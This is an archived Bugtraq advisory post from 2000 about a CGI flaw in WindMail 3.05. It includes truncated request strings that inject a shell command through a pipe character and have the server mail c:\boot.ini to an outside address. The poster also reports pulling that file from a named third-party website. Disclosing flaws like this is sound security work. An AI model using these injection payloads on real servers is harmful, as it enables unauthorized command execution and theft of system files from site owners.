Home page logo

bugtraq logo Bugtraq mailing list archives

Windmail allow web user get any file
From: frankie () CNNS NET (Frankie Zie)
Date: Sat, 25 Mar 2000 22:41:46 -0000

I found some vulnerabilities if windmail run as a CGI 
application.tested On WindowsNT 4.0, Windmail 3.05 
WindMail is a 32-bit Windows console program by geocel that 
gives you command-line e-mail messaging capability.
You can download an evaluation copy of WindMail 3.0 at:    
WindMail has a feature that allow Mail HTML form results 
from CGI scripts
I found windmail doesn't check either attachment file or 
special character for parameters, that allow you execute 
arbitrary command which web user can do:
20yourmail () mail com%20|%20dir%20c:\ 
After the request, windmail will send c:\boot.ini to 
yourmail () mail com and execute "dir c:\" command.

For example:
20chinahack () 163 net
After a while, check chinahack () 163 net, i got a copy of 
boot.ini from www.metro.net
pp () cnns net

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]